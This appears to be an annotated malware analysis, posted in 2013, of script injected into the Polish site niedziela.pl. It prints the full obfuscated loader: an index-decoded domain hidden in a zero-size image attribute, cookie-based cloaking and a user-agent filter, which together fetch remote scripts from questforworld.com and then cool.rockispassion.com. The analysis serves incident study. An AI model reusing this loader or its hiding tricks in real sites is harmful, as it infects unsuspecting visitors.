rafalk

Szybka analiza infekcji niedziela.pl z 7 listopada 2013

Nov 12th, 2013
  1. //@[http://niedziela.pl] HTML:
  2.  
  3. <img id="beacon_73ef615c52" width="0" height="0" alt="" style="width: 0px; height: 0px;" data-image="oV]F?zd&gt;^O0$5rL&quot;E,)3T&lt;:#}N%u&amp;/{HXUSWps+ixt@bm~qGh7AvCQ;1-Jc*kZIgl!fnyw9DP6Rj2e[(aYB8._=KM4">
  4.  
  5. //@[http://niedziela.pl] JS/body:
  6.  
  7. function cc(ccn) { //ccn = "niedziela.pl" (observed); reports whether the reversed host name is absent from the page cookies
  8.     var c = d['cookie']; //"isMobile=0; showMobile=0; PHPSESSID=87iQQgiUbpmcOOq4O6wq-3; OAID=71cde3f523de987faf5bb0717bd00213" (d is the global alias for document set at listing line 21)
  9.     return c.search(ccn.split('').reverse().join('')) < 0; //true on this visit: no "lp.aleizdein" marker found; search() treats its argument as a regex, so "." matches any character
  10. }
  11.  
  12. function ch() { //returns the host name of the page the script is running on
  13.     var p = document.location.host; //"niedziela.pl"
  14.     return p; //"niedziela.pl"
  15. }
  16.  
  17. function fg() { //returns the location of the next script; it is stored as indexes that as() maps onto the data-image alphabet, so the domain never appears as plain text in the page source
  18.     return as([47, 27, 78, 37, 41, 67, 0, 13, 70, 0, 13, 65, 6, 85, 59, 0, 45, 29, 45, 78, 6, 39, 81, 29, 37, 59, 13, 39, 36, 41, 85, 76, 37]); //"questforworld.com/media/script.js"
  19. }
  20.  
  21. var d = document; //alias for the HTML document; cc() above and the remote script below both read this global
  22. if (cc(ch())) { //true: the reversed-host marker cookie is missing, so the remote script is injected
  23.     var ge = d.createElement('script'); //"<script></script>""
  24.     ge.src = document.location.protocol + '//' + fg(); //"http://questforworld.com/media/script.js" (same protocol as the infected page)
  25.     d.head.appendChild(ge); //"<script src="http://questforworld.com/media/script.js"></script>""
  26. } else {} //empty branch: nothing is injected while the marker cookie is present
  27.  
  28. function as(l) { //[47, 27, 78, 37, 41, 67, 0, 13, 70, 0, 13, 65, 6, 85, 59, 0, 45, 29, 45, 78, 6, 39, 81, 29, 37, 59, 13, 39, 36, 41, 85, 76, 37] (observed argument); decodes an array of indexes into a string using the alphabet returned by g1()
  29.     var g = g1().split(''), //["o", "V", "]", "F", "?", "z", "d", ">", "^", "O", "0", "$", "5", "r", "L", """, "E", ",", ")", "3", "T", "<", ":", "#", "}", "N", "%", "u", "&", "/", "{", "H", "X", "U", "S", "W", "p", "s", "+", "i", "x", "t", "`", "@", "b", "m", "~", "q", "G", "h", "7", "A", "v", "C", "Q", ";", "1", "-", "J", "c", "*", "k", "Z", "I", "g", "l", "!", "f", "n", "y", "w", "9", "D", "P", "6", "R", "j", "2", "e", "[", "(", "a", "Y", "B", "8", ".", "_", "=", "K", "M", "4"]
  30.         t = new String(); //""
  31.     for (var al in l) { //al walks the index keys of l
  32.         t += g[l[al]]; //each number selects one character of the alphabet, e.g. 47 -> "q", 27 -> "u"
  33.     }
  34.     return t; //"questforworld.com/media/script.js"
  35. }
  36.  
  37. function g1() { //returns the lookup alphabet kept in the data-image attribute of the zero-size <img id="beacon_73ef615c52">
  38.     return document.getElementById('beacon_73ef615c52').getAttribute('data-image'); //"oV]F?zd>^O0$5rL"E,)3T<:#}N%u&/{HXUSWps+ixt`@bm~qGh7AvCQ;1-Jc*kZIgl!fnyw9DP6Rj2e[(aYB8._=KM4" (the HTML excerpt at listing line 3 prints this value without the backtick after "t"; the index arrays only decode to the noted strings with the backtick present)
  39. }
  40.  
  41.  
  42.  
  43.  
  44. //@[http://questforworld.com/media/script.js]:
  45.  
  46. var gi = window.g1 || gl; //gi is a function reference: the page's own g1 when it is defined, otherwise this script's gl; on niedziela.pl gi() returns "oV]F?zd>^O0$5rL"E,)3T<:#}N%u&/{HXUSWps+ixt`@bm~qGh7AvCQ;1-Jc*kZIgl!fnyw9DP6Rj2e[(aYB8._=KM4"
  47.  
  48. function ua() { //user-agent filter: true when the lower-cased UA string contains any listed keyword; the caller injects the next script only when this is false
  49.     return /safari|linux|mac|mini|android|nokia|mobile/.test(navigator.userAgent.toLowerCase()); //true for Chrome (its user-agent string contains "safari")
  50. }
  51.  
  52. function cm(nm, ti) { //sets a marker cookie: nm is the cookie name, ti its lifetime in seconds
  53.     document.cookie = nm + '=1;path=/;max-age=' + ti; //writes "<nm>=1" for every path of the site, expiring after ti seconds
  54. }
  55.  
  56. function cl() { //returns the host name reversed; this is the cookie name that cc() in the page's inline script searches for
  57.     var p = document.location.host; //"niedziela.pl"
  58.     return p.split('').reverse().join(''); //"lp.aleizdein"
  59. }
  60.  
  61. function cnr() { //returns the name of the "seen before" cookie, derived from the host name
  62.     var p = document.location.host; //"niedziela.pl"
  63.     return p.split(/^a-z0-9/).join(''); //"niedziela.pl" (unchanged: /^a-z0-9/ is an anchored literal, not the character class [^a-z0-9], so split() finds nothing to cut; NOTE(review): a character class was presumably intended)
  64. }
  65.  
  66. function gl() { //built-in alphabet; selected as gi (listing line 46) only when the hosting page defines no g1
  67.     return '(MV>`O!BwnA,Xs]Py1c&=Q5Er^<uZ/"2oDmtpdxzajKq_IgJH@4UC?*L;e7vh[i0N.-b~FlST8}k:G)9{YRW$f%36+#';
  68. }
  69.  
  70. function fh() { //returns the location of the following script, again stored as alphabet indexes and decoded by az()
  71.     return az([59, 0, 0, 65, 85, 13, 0, 59, 61, 39, 37, 36, 81, 37, 37, 39, 0, 68, 85, 59, 0, 45, 29, 76, 37, 29, 37, 59, 13, 39, 36, 41, 85, 76, 37]); //"cool.rockispassion.com/js/script.js"
  72.     //analyst note: the index array was later changed to [70,17,70,70,6,51,15,65,76,18,8,62,85,17,62,62,8,65,9,51,76,65,57,0,86,62,0,62,76,15,8,85,47,51,86,62]
  73. }
  74.  
  75. function az(tt) { //decodes an array of indexes into a string using the alphabet returned by gi()
  76.     var g = gi().split(''), //["o", "V", "]", "F", "?", "z", "d", ">", "^", "O", "0", "$", "5", "r", "L", """, "E", ",", ")", "3", "T", "<", ":", "#", "}", "N", "%", "u", "&", "/", "{", "H", "X", "U", "S", "W", "p", "s", "+", "i", "x", "t", "`", "@", "b", "m", "~", "q", "G", "h", "7", "A", "v", "C", "Q", ";", "1", "-", "J", "c", "*", "k", "Z", "I", "g", "l", "!", "f", "n", "y", "w", "9", "D", "P", "6", "R", "j", "2", "e", "[", "(", "a", "Y", "B", "8", ".", "_", "=", "K", "M", "4"]
  77.         tl = new String(); //""
  78.     for (var ab in tt) { //ab walks the index keys of tt
  79.         tl += g[tt[ab]]; //each number selects one character of the alphabet
  80.     }
  81.     return tl; //"cool.rockispassion.com/js/script.js"
  82. }
  83.  
  84. function cct() { //reports whether the cookie named by cnr() is already present
  85.     return document.cookie.search(cnr()) > -1; //false on the first page load (cookie not set yet); the name is used as a regex pattern by search()
  86. }
  87. if (!cct()) { //true on the first page load; false on the second page load
  88.     cm(cnr(), 9999999); //"niedziela.pl=1;path=/;max-age=9999999" (about 115 days); the first load only plants cookies, nothing further is loaded
  89.     cm(cl(), 100); //"lp.aleizdein=1;path=/;max-age=100"; while this cookie lives, cc() in the page's inline script returns false
  90. } else {
  91.     if (!ua()) { //only user agents that match none of the ua() keywords receive the next script
  92.         var fm = d.createElement(az([37, 59, 13, 39, 36, 41])); //<script></script> (the indexes decode to "script"; d is the global defined by the page's inline script)
  93.         //analyst note: later changed to 62,76,15,8,85,47
  94.         fm.async = 1; //<script async></script> #http://davidwalsh.name/html5-async
  95.         fm.src = document.location.protocol + '//' + fh(); //<script async src="http://cool.rockispassion.com/js/script.js"></script>
  96.         d.body.appendChild(fm); //appends the new script element to the page body
  97.         cm(cl(), 432000); //"lp.aleizdein=1;path=/;max-age=432000" (5 days)
  98.     } else {} //empty branch: filtered user agents get no script and no new cookie
  99. }
  100.  
  101. //@[http://cool.rockispassion.com/js/script.js]: ??